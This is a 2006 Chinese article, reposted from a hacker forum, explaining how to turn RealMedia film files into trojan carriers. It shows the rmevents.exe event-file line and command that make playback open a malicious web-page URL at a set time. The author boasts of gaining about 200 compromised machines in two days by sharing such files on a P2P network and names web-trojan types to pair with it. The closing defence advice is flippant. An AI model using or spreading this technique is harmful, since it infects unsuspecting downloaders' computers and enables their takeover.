强烈警惕!real文件中也能包含木马 |
作者: 来源:
阅读 数 362 人次 , 2006-4-25 9:48:00 |
|
推荐文章:程序员到系统分析员·论项目管理的是与非·网页设计创业者大有作为·程序员跳槽注意
Dreamweaver构建Blog实录 ·(译)用CSS设计日历 ·品尝Java咖啡馆 ·程序员的十年辛酸路
看来爱看电影也有罪!!!??并不神奇的Real影片木马
前2天在邪恶八进制安全小组论坛看到了.因为文中作者说不允许转载.所以没转.不过今天在2个个人blog上都看到转载了.所以就转了过来.如果作者有异议.我们随时拿掉:)
文章作者:intruder
信息来源:邪恶八进制中国
在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我下了一个这样的小木马,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。
使用HelixProducerPlus9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口.
新建一个文本文件rmevents.txt.
输入:
u00:01:00.000:01:30.0http://www.muma.com.cn/muma.html
我来解释一下,它意思是说在00:01:00.000:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的木马地址。
输入rmevents-i电影.rm-ermevents.txt-o电影1.rm这个命令,生成的电影.rm就是我们的木马文件了。
http://www.muma.com.cn/muma.html这个地址是你做好的网页木马的地址,不管是动鲨木马啊,还是EXE2BMP的木马,还是什么CHM木马,还是我崇拜的冰狐大哥的IFRAME溢出的网页木马.rar都可以。主要是新,威力强。
大家可以试一下。呵呵,intruder原创。本文暂时不允许被其他网站转载,只作为E.S.T的兄弟间的交流。谢谢。
防御方法更简单,嘿嘿,不看电影就没事了。要不就不用Realpalyer看吧,换别的播放器。
网易学院评:如今这个病毒木马泛滥的社会,大家做任何事情,都要提起一百个小心。真不知道互联网现在究竟是一条快速路还是一条肮脏不堪的臭水沟 |
|
